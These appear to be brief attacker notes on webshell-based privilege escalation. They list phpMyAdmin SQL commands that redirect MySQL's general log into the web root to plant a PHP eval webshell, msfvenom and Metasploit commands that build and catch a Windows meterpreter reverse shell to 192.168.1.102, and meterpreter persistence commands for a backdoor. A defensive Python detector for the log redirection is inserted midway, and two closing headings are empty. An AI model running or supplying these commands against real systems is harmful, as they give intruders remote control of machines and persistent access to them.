Webshell privilege escalation

Some of the commands used:

phpmyadmin:
`show variables like 'general%';`

`set global general_log="on";`

`set global general_log_file = 'c:/php/www/24.php';`

`select '<?php eval($_POST[cmd]);?>'`
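
A defender-side check for the general_log redirection shown above, as an added example that is not part of the original notes: it scans SQL statements (for instance from an audit or query log) for `general_log_file` being pointed at a path with a script extension. The function name, the extension list, the severity labels and the sample session are assumptions made for this example.

```python
import re

# Extensions a web server may execute; a log file should never carry one (assumed list).
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx")

# SET GLOBAL general_log_file = '...'  or  SET @@GLOBAL.general_log_file = "..."
SET_FILE = re.compile(
    r"set\s+(?:global\s+|@@global\.)general_log_file\s*=\s*(['\"])(?P<path>.*?)\1",
    re.IGNORECASE,
)
# SET GLOBAL general_log = on / "on" / 1 (does not match general_log_file)
SET_ON = re.compile(
    r"set\s+(?:global\s+|@@global\.)general_log\s*=\s*['\"]?(?:on|1)\b",
    re.IGNORECASE,
)

# Constructed sample session; the last statement is a benign log location.
SAMPLE = [
    "show variables like 'general%';",
    'set global general_log="on";',
    "SET GLOBAL general_log_file = 'c:/php/www/24.php';",
    "set global general_log_file = '/var/log/mysql/general.log';",
]


def find_log_redirects(statements):
    """Return one finding per statement that points the general log at a script file."""
    # Severity is raised when the same session also switches the general log on.
    logging_enabled = any(SET_ON.search(s) for s in statements)
    findings = []
    for lineno, stmt in enumerate(statements, start=1):
        m = SET_FILE.search(stmt)
        if not m:
            continue
        path = m.group("path").replace("\\", "/")  # normalise Windows separators
        if path.lower().endswith(SCRIPT_EXTS):
            findings.append({
                "line": lineno,
                "path": path,
                "severity": "high" if logging_enabled else "medium",
            })
    return findings


if __name__ == "__main__":
    for finding in find_log_redirects(SAMPLE):
        print(finding)
```

On a live server the current values can be read with `SELECT @@global.general_log, @@global.general_log_file;`, and the write only succeeds if the database service account can write into the web root.
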
msfconsole:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f exe >42.exe  

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options

run
Backdoor:
run persistence -h

run persistence -S -U -X -i S -p 4444 -r 192.168.1.102

Database privilege escalation

In-memory execution with PowerShell